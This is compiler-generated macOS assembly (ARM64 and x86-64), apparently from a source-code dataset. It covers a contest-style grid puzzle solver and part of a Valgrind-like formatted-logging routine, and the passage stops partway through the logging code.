LBB0_70: ; in Loop: Header=BB0_69 Depth=2
ldrsw x8, [sp, #60]
lsl x9, x8, #3
add x8, sp, #136
ldr w9, [x8, x9]
; implicit-def: $x10
mov x10, x9
ldrsw x9, [sp, #60]
add x8, x8, x9, lsl #3
ldr w9, [x8, #4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_71
LBB0_71: ; in Loop: Header=BB0_69 Depth=2
ldr w8, [sp, #60]
add w8, w8, #1
str w8, [sp, #60]
b LBB0_69
LBB0_72: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp, #56]
b LBB0_73
LBB0_73: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #56]
ldr w9, [sp, #112]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_76
b LBB0_74
LBB0_74: ; in Loop: Header=BB0_73 Depth=2
ldrsw x8, [sp, #56]
lsl x9, x8, #3
add x8, sp, #1736
ldr w9, [x8, x9]
; implicit-def: $x10
mov x10, x9
ldrsw x9, [sp, #56]
add x8, x8, x9, lsl #3
ldr w9, [x8, #4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
b LBB0_75
LBB0_75: ; in Loop: Header=BB0_73 Depth=2
ldr w8, [sp, #56]
add w8, w8, #1
str w8, [sp, #56]
b LBB0_73
LBB0_76: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp, #52]
b LBB0_77
LBB0_77: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #52]
ldr w9, [sp, #108]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_80
b LBB0_78
LBB0_78: ; in Loop: Header=BB0_77 Depth=2
ldrsw x8, [sp, #52]
lsl x9, x8, #3
add x8, sp, #936
ldr w9, [x8, x9]
; implicit-def: $x10
mov x10, x9
ldrsw x9, [sp, #52]
add x8, x8, x9, lsl #3
ldr w9, [x8, #4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
b LBB0_79
LBB0_79: ; in Loop: Header=BB0_77 Depth=2
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB0_77
LBB0_80: ; in Loop: Header=BB0_1 Depth=1
b LBB0_81
LBB0_81: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #96]
add w8, w8, #1
str w8, [sp, #96]
b LBB0_1
LBB0_82:
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_84
b LBB0_83
LBB0_83:
bl ___stack_chk_fail
LBB0_84:
mov w0, #0
add sp, sp, #6, lsl #12 ; =24576
add sp, sp, #1024
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "%d%d"
l_.str.2: ; @.str.2
.asciz "%s"
l_.str.3: ; @.str.3
.asciz "Case #%d: %d %d\n"
l_.str.4: ; @.str.4
.asciz "o %d %d\n"
l_.str.5: ; @.str.5
.asciz "+ %d %d\n"
l_.str.6: ; @.str.6
.asciz "x %d %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $25568, %eax ## imm = 0x63E0
callq ____chkstk_darwin
subq %rax, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -25476(%rbp)
leaq L_.str(%rip), %rdi
leaq -25480(%rbp), %rsi
movb $0, %al
callq _scanf
movl $1, -25512(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
## Child Loop BB0_13 Depth 2
## Child Loop BB0_15 Depth 3
## Child Loop BB0_29 Depth 2
## Child Loop BB0_31 Depth 3
## Child Loop BB0_40 Depth 2
## Child Loop BB0_42 Depth 3
## Child Loop BB0_69 Depth 2
## Child Loop BB0_73 Depth 2
## Child Loop BB0_77 Depth 2
movl -25512(%rbp), %eax
cmpl -25480(%rbp), %eax
jg LBB0_82
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $0, -25496(%rbp)
movl $0, -25500(%rbp)
movl $0, -25504(%rbp)
movl $0, -25508(%rbp)
leaq L_.str.1(%rip), %rdi
leaq -25484(%rbp), %rsi
leaq -25488(%rbp), %rdx
movb $0, %al
callq _scanf
leaq -432(%rbp), %rdi
movl $48, %esi
movl $408, %edx ## imm = 0x198
callq _memset
leaq -640(%rbp), %rdi
movl $48, %esi
movl $208, %edx
callq _memset
leaq -11456(%rbp), %rdi
movl $48, %esi
movl $10816, %edx ## imm = 0x2A40
callq _memset
leaq -22272(%rbp), %rdi
movl $48, %esi
movl $10816, %edx ## imm = 0x2A40
callq _memset
movl $0, -25516(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -25516(%rbp), %eax
cmpl -25488(%rbp), %eax
jge LBB0_12
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
leaq -25492(%rbp), %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _scanf
leaq -16(%rbp), %rsi
leaq -16(%rbp), %rdx
addq $4, %rdx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _scanf
movsbl -25492(%rbp), %eax
cmpl $43, %eax
je LBB0_6
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movsbl -25492(%rbp), %eax
cmpl $111, %eax
jne LBB0_7
LBB0_6: ## in Loop: Header=BB0_3 Depth=2
movl -16(%rbp), %eax
addl -12(%rbp), %eax
cltq
movb $49, -432(%rbp,%rax,2)
movl -16(%rbp), %eax
subl -12(%rbp), %eax
addl -25484(%rbp), %eax
cltq
movb $49, -431(%rbp,%rax,2)
movslq -16(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -12(%rbp), %rcx
movb $51, (%rax,%rcx)
LBB0_7: ## in Loop: Header=BB0_3 Depth=2
movsbl -25492(%rbp), %eax
cmpl $120, %eax
je LBB0_9
## %bb.8: ## in Loop: Header=BB0_3 Depth=2
movsbl -25492(%rbp), %eax
cmpl $111, %eax
jne LBB0_10
LBB0_9: ## in Loop: Header=BB0_3 Depth=2
movslq -16(%rbp), %rax
movb $49, -640(%rbp,%rax,2)
movslq -12(%rbp), %rax
movb $49, -639(%rbp,%rax,2)
movslq -16(%rbp), %rcx
leaq -22272(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -12(%rbp), %rcx
movb $51, (%rax,%rcx)
LBB0_10: ## in Loop: Header=BB0_3 Depth=2
jmp LBB0_11
LBB0_11: ## in Loop: Header=BB0_3 Depth=2
movl -25516(%rbp), %eax
addl $1, %eax
movl %eax, -25516(%rbp)
jmp LBB0_3
LBB0_12: ## in Loop: Header=BB0_1 Depth=1
movl -25484(%rbp), %eax
movl %eax, -25520(%rbp)
movl $1, -25524(%rbp)
LBB0_13: ## Parent Loop BB0_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_15 Depth 3
movl -25520(%rbp), %eax
cmpl -25524(%rbp), %eax
jl LBB0_28
## %bb.14: ## in Loop: Header=BB0_13 Depth=2
movl -25524(%rbp), %eax
movl %eax, -25528(%rbp)
LBB0_15: ## Parent Loop BB0_1 Depth=1
## Parent Loop BB0_13 Depth=2
## => This Inner Loop Header: Depth=3
movl -25528(%rbp), %eax
cmpl -25520(%rbp), %eax
jg LBB0_26
## %bb.16: ## in Loop: Header=BB0_15 Depth=3
movl -25524(%rbp), %eax
addl -25528(%rbp), %eax
cltq
movsbl -432(%rbp,%rax,2), %eax
cmpl $48, %eax
jne LBB0_20
## %bb.17: ## in Loop: Header=BB0_15 Depth=3
movl -25524(%rbp), %eax
subl -25528(%rbp), %eax
addl -25484(%rbp), %eax
cltq
movsbl -431(%rbp,%rax,2), %eax
cmpl $48, %eax
jne LBB0_19
## %bb.18: ## in Loop: Header=BB0_15 Depth=3
movslq -25524(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25528(%rbp), %rcx
movb $50, (%rax,%rcx)
movl -25528(%rbp), %eax
addl -25524(%rbp), %eax
cltq
movb $49, -432(%rbp,%rax,2)
movl -25524(%rbp), %eax
subl -25528(%rbp), %eax
addl -25484(%rbp), %eax
cltq
movb $49, -431(%rbp,%rax,2)
LBB0_19: ## in Loop: Header=BB0_15 Depth=3
jmp LBB0_20
LBB0_20: ## in Loop: Header=BB0_15 Depth=3
movl -25520(%rbp), %eax
addl -25528(%rbp), %eax
cltq
movsbl -432(%rbp,%rax,2), %eax
cmpl $48, %eax
jne LBB0_24
## %bb.21: ## in Loop: Header=BB0_15 Depth=3
movl -25520(%rbp), %eax
subl -25528(%rbp), %eax
addl -25484(%rbp), %eax
cltq
movsbl -431(%rbp,%rax,2), %eax
cmpl $48, %eax
jne LBB0_23
## %bb.22: ## in Loop: Header=BB0_15 Depth=3
movslq -25520(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25528(%rbp), %rcx
movb $50, (%rax,%rcx)
movl -25520(%rbp), %eax
addl -25528(%rbp), %eax
cltq
movb $49, -432(%rbp,%rax,2)
movl -25520(%rbp), %eax
subl -25528(%rbp), %eax
addl -25484(%rbp), %eax
cltq
movb $49, -431(%rbp,%rax,2)
LBB0_23: ## in Loop: Header=BB0_15 Depth=3
jmp LBB0_24
LBB0_24: ## in Loop: Header=BB0_15 Depth=3
jmp LBB0_25
LBB0_25: ## in Loop: Header=BB0_15 Depth=3
movl -25528(%rbp), %eax
addl $1, %eax
movl %eax, -25528(%rbp)
jmp LBB0_15
LBB0_26: ## in Loop: Header=BB0_13 Depth=2
jmp LBB0_27
LBB0_27: ## in Loop: Header=BB0_13 Depth=2
movl -25520(%rbp), %eax
addl $-1, %eax
movl %eax, -25520(%rbp)
movl -25524(%rbp), %eax
addl $1, %eax
movl %eax, -25524(%rbp)
jmp LBB0_13
LBB0_28: ## in Loop: Header=BB0_1 Depth=1
movl $1, -25532(%rbp)
LBB0_29: ## Parent Loop BB0_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_31 Depth 3
movl -25532(%rbp), %eax
cmpl -25484(%rbp), %eax
jg LBB0_39
## %bb.30: ## in Loop: Header=BB0_29 Depth=2
movl $1, -25536(%rbp)
LBB0_31: ## Parent Loop BB0_1 Depth=1
## Parent Loop BB0_29 Depth=2
## => This Inner Loop Header: Depth=3
movl -25536(%rbp), %eax
cmpl -25484(%rbp), %eax
jg LBB0_37
## %bb.32: ## in Loop: Header=BB0_31 Depth=3
movslq -25532(%rbp), %rax
movsbl -640(%rbp,%rax,2), %eax
cmpl $48, %eax
jne LBB0_35
## %bb.33: ## in Loop: Header=BB0_31 Depth=3
movslq -25536(%rbp), %rax
movsbl -639(%rbp,%rax,2), %eax
cmpl $48, %eax
jne LBB0_35
## %bb.34: ## in Loop: Header=BB0_31 Depth=3
movslq -25532(%rbp), %rcx
leaq -22272(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25536(%rbp), %rcx
movb $50, (%rax,%rcx)
movslq -25532(%rbp), %rax
movb $49, -640(%rbp,%rax,2)
movslq -25536(%rbp), %rax
movb $49, -639(%rbp,%rax,2)
LBB0_35: ## in Loop: Header=BB0_31 Depth=3
jmp LBB0_36
LBB0_36: ## in Loop: Header=BB0_31 Depth=3
movl -25536(%rbp), %eax
addl $1, %eax
movl %eax, -25536(%rbp)
jmp LBB0_31
LBB0_37: ## in Loop: Header=BB0_29 Depth=2
jmp LBB0_38
LBB0_38: ## in Loop: Header=BB0_29 Depth=2
movl -25532(%rbp), %eax
addl $1, %eax
movl %eax, -25532(%rbp)
jmp LBB0_29
LBB0_39: ## in Loop: Header=BB0_1 Depth=1
movl $1, -25540(%rbp)
LBB0_40: ## Parent Loop BB0_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_42 Depth 3
movl -25540(%rbp), %eax
cmpl -25484(%rbp), %eax
jg LBB0_68
## %bb.41: ## in Loop: Header=BB0_40 Depth=2
movl $1, -25544(%rbp)
LBB0_42: ## Parent Loop BB0_1 Depth=1
## Parent Loop BB0_40 Depth=2
## => This Inner Loop Header: Depth=3
movl -25544(%rbp), %eax
cmpl -25484(%rbp), %eax
jg LBB0_66
## %bb.43: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -22272(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $50, %eax
jne LBB0_46
## %bb.44: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $50, %eax
jl LBB0_46
## %bb.45: ## in Loop: Header=BB0_42 Depth=3
movl -25540(%rbp), %ecx
movslq -25504(%rbp), %rax
movl %ecx, -25472(%rbp,%rax,8)
movl -25544(%rbp), %ecx
movslq -25504(%rbp), %rax
movl %ecx, -25468(%rbp,%rax,8)
movl -25504(%rbp), %eax
addl $1, %eax
movl %eax, -25504(%rbp)
jmp LBB0_64
LBB0_46: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -22272(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $51, %eax
jne LBB0_49
## %bb.47: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $51, %eax
jne LBB0_49
## %bb.48: ## in Loop: Header=BB0_42 Depth=3
movl -25508(%rbp), %eax
addl $2, %eax
movl %eax, -25508(%rbp)
jmp LBB0_63
LBB0_49: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -22272(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $51, %eax
jne LBB0_52
## %bb.50: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $50, %eax
jne LBB0_52
## %bb.51: ## in Loop: Header=BB0_42 Depth=3
movl -25540(%rbp), %ecx
movslq -25504(%rbp), %rax
movl %ecx, -25472(%rbp,%rax,8)
movl -25544(%rbp), %ecx
movslq -25504(%rbp), %rax
movl %ecx, -25468(%rbp,%rax,8)
movl -25504(%rbp), %eax
addl $1, %eax
movl %eax, -25504(%rbp)
jmp LBB0_62
LBB0_52: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -22272(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $50, %eax
jne LBB0_54
## %bb.53: ## in Loop: Header=BB0_42 Depth=3
movl -25540(%rbp), %ecx
movslq -25500(%rbp), %rax
movl %ecx, -24672(%rbp,%rax,8)
movl -25544(%rbp), %ecx
movslq -25500(%rbp), %rax
movl %ecx, -24668(%rbp,%rax,8)
movl -25500(%rbp), %eax
addl $1, %eax
movl %eax, -25500(%rbp)
jmp LBB0_61
LBB0_54: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $50, %eax
jne LBB0_56
## %bb.55: ## in Loop: Header=BB0_42 Depth=3
movl -25540(%rbp), %ecx
movslq -25496(%rbp), %rax
movl %ecx, -23872(%rbp,%rax,8)
movl -25544(%rbp), %ecx
movslq -25496(%rbp), %rax
movl %ecx, -23868(%rbp,%rax,8)
movl -25496(%rbp), %eax
addl $1, %eax
movl %eax, -25496(%rbp)
jmp LBB0_60
LBB0_56: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -22272(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $51, %eax
je LBB0_58
## %bb.57: ## in Loop: Header=BB0_42 Depth=3
movslq -25540(%rbp), %rcx
leaq -11456(%rbp), %rax
imulq $104, %rcx, %rcx
addq %rcx, %rax
movslq -25544(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $51, %eax
jne LBB0_59
LBB0_58: ## in Loop: Header=BB0_42 Depth=3
movl -25508(%rbp), %eax
addl $1, %eax
movl %eax, -25508(%rbp)
LBB0_59: ## in Loop: Header=BB0_42 Depth=3
jmp LBB0_60
LBB0_60: ## in Loop: Header=BB0_42 Depth=3
jmp LBB0_61
LBB0_61: ## in Loop: Header=BB0_42 Depth=3
jmp LBB0_62
LBB0_62: ## in Loop: Header=BB0_42 Depth=3
jmp LBB0_63
LBB0_63: ## in Loop: Header=BB0_42 Depth=3
jmp LBB0_64
LBB0_64: ## in Loop: Header=BB0_42 Depth=3
jmp LBB0_65
LBB0_65: ## in Loop: Header=BB0_42 Depth=3
movl -25544(%rbp), %eax
addl $1, %eax
movl %eax, -25544(%rbp)
jmp LBB0_42
LBB0_66: ## in Loop: Header=BB0_40 Depth=2
jmp LBB0_67
LBB0_67: ## in Loop: Header=BB0_40 Depth=2
movl -25540(%rbp), %eax
addl $1, %eax
movl %eax, -25540(%rbp)
jmp LBB0_40
LBB0_68: ## in Loop: Header=BB0_1 Depth=1
movl -25512(%rbp), %esi
movl -25508(%rbp), %edx
addl -25500(%rbp), %edx
addl -25496(%rbp), %edx
movl -25504(%rbp), %eax
shll $1, %eax
addl %eax, %edx
movl -25500(%rbp), %ecx
addl -25496(%rbp), %ecx
addl -25504(%rbp), %ecx
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -25548(%rbp)
LBB0_69: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -25548(%rbp), %eax
cmpl -25504(%rbp), %eax
jge LBB0_72
## %bb.70: ## in Loop: Header=BB0_69 Depth=2
movslq -25548(%rbp), %rax
movl -25472(%rbp,%rax,8), %esi
movslq -25548(%rbp), %rax
movl -25468(%rbp,%rax,8), %edx
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
## %bb.71: ## in Loop: Header=BB0_69 Depth=2
movl -25548(%rbp), %eax
addl $1, %eax
movl %eax, -25548(%rbp)
jmp LBB0_69
LBB0_72: ## in Loop: Header=BB0_1 Depth=1
movl $0, -25552(%rbp)
LBB0_73: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -25552(%rbp), %eax
cmpl -25496(%rbp), %eax
jge LBB0_76
## %bb.74: ## in Loop: Header=BB0_73 Depth=2
movslq -25552(%rbp), %rax
movl -23872(%rbp,%rax,8), %esi
movslq -25552(%rbp), %rax
movl -23868(%rbp,%rax,8), %edx
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
## %bb.75: ## in Loop: Header=BB0_73 Depth=2
movl -25552(%rbp), %eax
addl $1, %eax
movl %eax, -25552(%rbp)
jmp LBB0_73
LBB0_76: ## in Loop: Header=BB0_1 Depth=1
movl $0, -25556(%rbp)
LBB0_77: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -25556(%rbp), %eax
cmpl -25500(%rbp), %eax
jge LBB0_80
## %bb.78: ## in Loop: Header=BB0_77 Depth=2
movslq -25556(%rbp), %rax
movl -24672(%rbp,%rax,8), %esi
movslq -25556(%rbp), %rax
movl -24668(%rbp,%rax,8), %edx
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
## %bb.79: ## in Loop: Header=BB0_77 Depth=2
movl -25556(%rbp), %eax
addl $1, %eax
movl %eax, -25556(%rbp)
jmp LBB0_77
LBB0_80: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_81
LBB0_81: ## in Loop: Header=BB0_1 Depth=1
movl -25512(%rbp), %eax
addl $1, %eax
movl %eax, -25512(%rbp)
jmp LBB0_1
LBB0_82:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_84
## %bb.83:
xorl %eax, %eax
addq $25568, %rsp ## imm = 0x63E0
popq %rbp
retq
LBB0_84:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "%d%d"
L_.str.2: ## @.str.2
.asciz "%s"
L_.str.3: ## @.str.3
.asciz "Case #%d: %d %d\n"
L_.str.4: ## @.str.4
.asciz "o %d %d\n"
L_.str.5: ## @.str.5
.asciz "+ %d %d\n"
L_.str.6: ## @.str.6
.asciz "x %d %d\n"
.subsections_via_symbols
| the_stack_data/387689.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _VG_vprintf ; -- Begin function VG_vprintf
.p2align 2
_VG_vprintf: ; @VG_vprintf
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str x1, [sp]
ldr x1, [sp, #8]
ldr x2, [sp]
adrp x0, _VG_log_output_sink@PAGE
add x0, x0, _VG_log_output_sink@PAGEOFF
bl _vprintf_WRK
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function vprintf_WRK
_vprintf_WRK: ; @vprintf_WRK
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #592
add x8, sp, #56
str x8, [sp, #16] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str x0, [sp, #48]
str x1, [sp, #40]
str x2, [sp, #32]
add x0, sp, #56
str x0, [sp, #8] ; 8-byte Folded Spill
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
mov x2, #512
bl _memcpy
ldr x0, [sp, #8] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
str wzr, [sp, #568]
ldr x8, [sp, #48]
str x8, [x9, #520]
ldr x1, [sp, #40]
ldr x2, [sp, #32]
bl _vprintf_to_buf
str w0, [sp, #28]
ldr w8, [sp, #568]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
ldr x8, [sp, #16] ; 8-byte Folded Reload
add x1, sp, #56
ldr x0, [x8, #520]
ldr w2, [sp, #568]
bl _send_bytes_to_logging_sink
b LBB1_2
LBB1_2:
ldr w8, [sp, #28]
str w8, [sp, #4] ; 4-byte Folded Spill
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB1_4
b LBB1_3
LBB1_3:
bl ___stack_chk_fail
LBB1_4:
ldr w0, [sp, #4] ; 4-byte Folded Reload
add sp, sp, #592
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _VG_printf ; -- Begin function VG_printf
.p2align 2
_VG_printf: ; @VG_printf
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
add x9, sp, #8
add x8, x29, #16
str x8, [x9]
ldur x0, [x29, #-8]
ldr x1, [sp, #8]
bl _VG_vprintf
stur w0, [x29, #-12]
ldur w0, [x29, #-12]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _VG_debugLog_vprintf ; -- Begin function VG_debugLog_vprintf
.p2align 2
_VG_debugLog_vprintf: ; @VG_debugLog_vprintf
.cfi_startproc
; %bb.0:
sub sp, sp, #208
.cfi_def_cfa_offset 208
stp x29, x30, [sp, #192] ; 16-byte Folded Spill
add x29, sp, #192
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur x2, [x29, #-24]
stur x3, [x29, #-32]
stur wzr, [x29, #-36]
stur wzr, [x29, #-52]
stur wzr, [x29, #-40]
b LBB3_1
LBB3_1: ; =>This Loop Header: Depth=1
; Child Loop BB3_9 Depth 2
; Child Loop BB3_19 Depth 2
; Child Loop BB3_24 Depth 2
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_67
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #37
cset w8, eq
tbnz w8, #0, LBB3_4
b LBB3_3
LBB3_3: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-8]
ldur x9, [x29, #-24]
ldursw x10, [x29, #-40]
ldrsb w0, [x9, x10]
ldur x1, [x29, #-16]
blr x8
ldur w8, [x29, #-36]
add w8, w8, #1
stur w8, [x29, #-36]
b LBB3_66
LBB3_4: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-40]
add w8, w8, #1
stur w8, [x29, #-40]
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB3_6
b LBB3_5
LBB3_5:
b LBB3_67
LBB3_6: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #37
cset w8, ne
tbnz w8, #0, LBB3_8
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-8]
ldur x1, [x29, #-16]
mov w0, #37
blr x8
ldur w8, [x29, #-36]
add w8, w8, #1
stur w8, [x29, #-36]
b LBB3_66
LBB3_8: ; in Loop: Header=BB3_1 Depth=1
stur wzr, [x29, #-44]
stur wzr, [x29, #-52]
stur wzr, [x29, #-48]
b LBB3_9
LBB3_9: ; Parent Loop BB3_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur x8, [x29, #-24]
ldursw x9, [x29, #-40]
ldrsb w8, [x8, x9]
subs w8, w8, #35
; kill: def $x8 killed $w8
str x8, [sp, #24] ; 8-byte Folded Spill
subs x8, x8, #13
cset w8, hi
tbnz w8, #0, LBB3_16
; %bb.10: ; in Loop: Header=BB3_9 Depth=2
ldr x11, [sp, #24] ; 8-byte Folded Reload
adrp x10, lJTI3_0@PAGE
add x10, x10, lJTI3_0@PAGEOFF
Ltmp0:
adr x8, Ltmp0
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB3_11: ; in Loop: Header=BB3_9 Depth=2
ldur w8, [x29, #-44]
orr w8, w8, #0x8
stur w8, [x29, #-44]
b LBB3_17
LBB3_12: ; in Loop: Header=BB3_9 Depth=2
ldur w8, [x29, #-44]
orr w8, w8, #0x10
stur w8, [x29, #-44]
b LBB3_17
LBB3_13: ; in Loop: Header=BB3_9 Depth=2
ldur w8, [x29, #-44]
orr w8, w8, #0x4
stur w8, [x29, #-44]
b LBB3_17
LBB3_14: ; in Loop: Header=BB3_9 Depth=2
ldur w8, [x29, #-44]
orr w8, w8, #0x2
stur w8, [x29, #-44]
b LBB3_17
LBB3_15: ; in Loop: Header=BB3_9 Depth=2
